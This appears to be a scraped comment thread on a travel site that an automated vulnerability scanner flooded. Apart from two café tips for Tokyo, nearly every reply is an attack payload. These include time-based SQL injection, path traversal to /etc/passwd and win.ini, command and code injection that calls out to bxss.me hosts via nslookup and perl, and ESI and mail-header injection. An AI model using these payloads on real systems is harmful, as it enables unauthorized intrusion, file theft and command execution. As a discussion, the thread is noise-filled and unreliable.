\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Yee How
WEB-INF/web.xml
re: Yee How
WEB-INF\web.xml
re: Yee How
1
re: Yee How
1
re: Yee How
-1 OR 2+93-93-1=0+0+0+1 --
re: Yee How
-1 OR 3+93-93-1=0+0+0+1 --
re: Yee How
-1 OR 2+630-630-1=0+0+0+1
re: Yee How
-1 OR 3+630-630-1=0+0+0+1
re: Yee How
-1' OR 2+279-279-1=0+0+0+1 --
re: Yee How
-1' OR 3+279-279-1=0+0+0+1 --
re: Yee How
-1' OR 2+61-61-1=0+0+0+1 or 'uAABXuFB'='
re: Yee How
-1' OR 3+61-61-1=0+0+0+1 or 'uAABXuFB'='
re: Yee How
-1" OR 2+149-149-1=0+0+0+1 --
re: Yee How
-1" OR 3+149-149-1=0+0+0+1 --
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
RyTzJ6Vy'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 876=(SELECT 876 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 418=(SELECT 418 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 20=(SELECT 20 FROM PG_SLEEP(15))--
re: Yee How
POq8roqj' OR 223=(SELECT 223 FROM PG_SLEEP(15))--
re: Yee How
TY7ODtzf') OR 128=(SELECT 128 FROM PG_SLEEP(15))--
re: Yee How
uC99EWQ8')) OR 24=(SELECT 24 FROM PG_SLEEP(15))--
re: Yee How
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@z5MX8
Café sensing touch of earth if you are going for a stroll through kappabashi
Turrets coffee if you are going to tsukiji
re: Wanderlusting
7Drx4cCA
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
-1 OR 2+805-805-1=0+0+0+1
re: Wanderlusting
-1 OR 3+805-805-1=0+0+0+1
re: Wanderlusting
if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
1 waitfor delay '0:0:15' --
re: Wanderlusting
GBkZubsx'; waitfor delay '0:0:15' --
re: Wanderlusting
-5 OR 585=(SELECT 585 FROM PG_SLEEP(15))--
re: Wanderlusting
-5) OR 211=(SELECT 211 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 243=(SELECT 243 FROM PG_SLEEP(15))--
re: Wanderlusting
twhTwWY7' OR 207=(SELECT 207 FROM PG_SLEEP(15))--
re: Wanderlusting
f7cqIM00') OR 444=(SELECT 444 FROM PG_SLEEP(15))--
re: Wanderlusting
RcdrJ6IT')) OR 210=(SELECT 210 FROM PG_SLEEP(15))--
re: Wanderlusting
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
1'"
re: Wanderlusting
@@RT4hX
re: Wanderlusting
aQIT4jW6
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
-1 OR 2+811-811-1=0+0+0+1
re: Wanderlusting
-1 OR 3+811-811-1=0+0+0+1
re: Wanderlusting
if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
1 waitfor delay '0:0:15' --
re: Wanderlusting
c2g6IxFL'; waitfor delay '0:0:15' --
re: Wanderlusting
-5 OR 802=(SELECT 802 FROM PG_SLEEP(15))--
re: Wanderlusting
-5) OR 649=(SELECT 649 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 884=(SELECT 884 FROM PG_SLEEP(15))--
re: Wanderlusting
CBEVM9k8' OR 832=(SELECT 832 FROM PG_SLEEP(15))--
re: Wanderlusting
ZkN03Y7O') OR 30=(SELECT 30 FROM PG_SLEEP(15))--
re: Wanderlusting
DvTN1xGZ')) OR 922=(SELECT 922 FROM PG_SLEEP(15))--
re: Wanderlusting
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
1'"
re: Wanderlusting
@@C7ySK
re: Wanderlusting
1yShViKnO
re: Wanderlusting
response.write(9697215*9845333)
re: Wanderlusting
<esi:include src="http://bxss.me/rpb.png"/>
re: Wanderlusting
%0abcc:074625.67-12769.67.d0d0a.19990.2@bxss.me
re: Wanderlusting
'+response.write(9697215*9845333)+'
re: Wanderlusting
${10000053+10000366}
re: Wanderlusting
to@example.com>%0d%0abcc:074625.67-12770.67.d0d0a.19990.2@bxss.me
re: Wanderlusting
"+response.write(9697215*9845333)+"
re: Wanderlusting
../../../../../../../../../../../../../../etc/passwd
re: Wanderlusting
../../../../../../../../../../../../../../windows/win.ini
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
'.gethostbyname(lc('hitxt'.'cfyelytga2b44.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(84).chr(117).chr(85).'
re: Wanderlusting
../../../../../../../../../../../../../../../proc/version
re: Wanderlusting
".gethostbyname(lc("hitrj"."kpwcphskbea14.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(69).chr(105).chr(78)."
re: Wanderlusting
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Wanderlusting
)
re: Wanderlusting
../../../../../../../../../../etc/passwd%00.jpg
re: Wanderlusting
!(()&&!|*|*|
re: Wanderlusting
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Wanderlusting
^(#$!@#$)(()))******
re: Wanderlusting
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Wanderlusting
HttP://bxss.me/t/xss.html?%00
re: Wanderlusting
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Wanderlusting
bxss.me/t/xss.html?%00
re: Wanderlusting
"+"A".concat(70-3).concat(22*4).concat(113).concat(80).concat(108).concat(84)+(require"socket"
Socket.gethostbyname("hitdj"+"vtxyvkxa376f2.bxss.me.")[3].to_s)+"
re: Wanderlusting
/etc/passwd
re: Wanderlusting
echo ienftt$()\ bmuqtl\nz^xyu||a #' &echo ienftt$()\ bmuqtl\nz^xyu||a #|" &echo ienftt$()\ bmuqtl\nz^xyu||a #
re: Wanderlusting
'+'A'.concat(70-3).concat(22*4).concat(116).concat(65).concat(100).concat(80)+(require'socket'
Socket.gethostbyname('hitky'+'dienoryo09dd2.bxss.me.')[3].to_s)+'
re: Wanderlusting
%2fetc%2fpasswd
re: Wanderlusting
&echo kadmjr$()\ trcztc\nz^xyu||a #' &echo kadmjr$()\ trcztc\nz^xyu||a #|" &echo kadmjr$()\ trcztc\nz^xyu||a #
re: Wanderlusting
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Wanderlusting
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Wanderlusting
|echo gbyidc$()\ raaoes\nz^xyu||a #' |echo gbyidc$()\ raaoes\nz^xyu||a #|" |echo gbyidc$()\ raaoes\nz^xyu||a #
re: Wanderlusting
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Wanderlusting
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Wanderlusting
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Wanderlusting
(nslookup hituzplojduez54578.bxss.me||perl -e "gethostbyname('hituzplojduez54578.bxss.me')")
re: Wanderlusting
Http://bxss.me/t/fit.txt
re: Wanderlusting
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Wanderlusting
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Wanderlusting
$(nslookup hithifvgqlzjy55632.bxss.me||perl -e "gethostbyname('hithifvgqlzjy55632.bxss.me')")
re: Wanderlusting
http://bxss.me/t/fit.txt%3F.jpg
re: Wanderlusting
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Wanderlusting
';print(md5(31337));$a='
re: Wanderlusting
'"
re: Wanderlusting
&nslookup hitsdxlgmzbnp00859.bxss.me&'\"`0&nslookup hitsdxlgmzbnp00859.bxss.me&`'
re: Wanderlusting
/etc/shells
re: Wanderlusting
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Wanderlusting
";print(md5(31337));$a="
re: Wanderlusting
<!--
re: Wanderlusting
&(nslookup hityskcnpcqfz93e22.bxss.me||perl -e "gethostbyname('hityskcnpcqfz93e22.bxss.me')")&'\"`0&(nslookup hityskcnpcqfz93e22.bxss.me||perl -e "gethostbyname('hityskcnpcqfz93e22.bxss.me')")&`'
re: Wanderlusting
c:/windows/win.ini
re: Wanderlusting
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Wanderlusting
${@print(md5(31337))}
re: Wanderlusting
|(nslookup hitfulwappety97792.bxss.me||perl -e "gethostbyname('hitfulwappety97792.bxss.me')")
re: Wanderlusting
bxss.me
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
${@print(md5(31337))}\
re: Wanderlusting
`(nslookup hitjtdkjgxewz90370.bxss.me||perl -e "gethostbyname('hitjtdkjgxewz90370.bxss.me')")`
re: Wanderlusting
/\../\../\../\../\../\../\../etc/passwd
re: Wanderlusting
'.print(md5(31337)).'
re: Wanderlusting
;(nslookup hitoruhrdlydzb9047.bxss.me||perl -e "gethostbyname('hitoruhrdlydzb9047.bxss.me')")|(nslookup hitoruhrdlydzb9047.bxss.me||perl -e "gethostbyname('hitoruhrdlydzb9047.bxss.me')")&(nslookup hitoruhrdlydzb9047.bxss.me||perl -e "gethostbyname('hitoruhrdlydzb9047.bxss.me')")
re: Wanderlusting
/WEB-INF/web.xml
re: Wanderlusting
C:\WINDOWS\system32\drivers\etc\hosts
re: Wanderlusting
../../../../../../../../../../windows/win.ini%00.jpg
re: Wanderlusting
/../../../../../../../../../../boot.ini
re: Wanderlusting
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Wanderlusting
..\..\..\..\..\..\..\..\windows\win.ini
re: Wanderlusting
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Wanderlusting
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Wanderlusting
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Wanderlusting
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Wanderlusting
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Wanderlusting
WEB-INF/web.xml
re: Wanderlusting
WEB-INF\web.xml
re: Wanderlusting
1
re: Wanderlusting
1
re: Wanderlusting
-1 OR 2+971-971-1=0+0+0+1 --
re: Wanderlusting
-1 OR 3+971-971-1=0+0+0+1 --
re: Wanderlusting
-1 OR 2+128-128-1=0+0+0+1
re: Wanderlusting
-1 OR 3+128-128-1=0+0+0+1
re: Wanderlusting
-1' OR 2+774-774-1=0+0+0+1 --
re: Wanderlusting
-1' OR 3+774-774-1=0+0+0+1 --
re: Wanderlusting
-1' OR 2+446-446-1=0+0+0+1 or 'lzbqaI4i'='
re: Wanderlusting
-1' OR 3+446-446-1=0+0+0+1 or 'lzbqaI4i'='
re: Wanderlusting
-1" OR 2+184-184-1=0+0+0+1 --
re: Wanderlusting
-1" OR 3+184-184-1=0+0+0+1 --
re: Wanderlusting
if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
1 waitfor delay '0:0:15' --
re: Wanderlusting
t7oErvom'; waitfor delay '0:0:15' --
re: Wanderlusting
-5 OR 554=(SELECT 554 FROM PG_SLEEP(15))--
re: Wanderlusting
-5) OR 731=(SELECT 731 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 81=(SELECT 81 FROM PG_SLEEP(15))--
re: Wanderlusting
BcjGFRmY' OR 880=(SELECT 880 FROM PG_SLEEP(15))--
re: Wanderlusting
E2Gaqz9I') OR 269=(SELECT 269 FROM PG_SLEEP(15))--
re: Wanderlusting
DqUoZXhJ')) OR 337=(SELECT 337 FROM PG_SLEEP(15))--
re: Wanderlusting
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
1'"
re: Wanderlusting
@@fhgBQ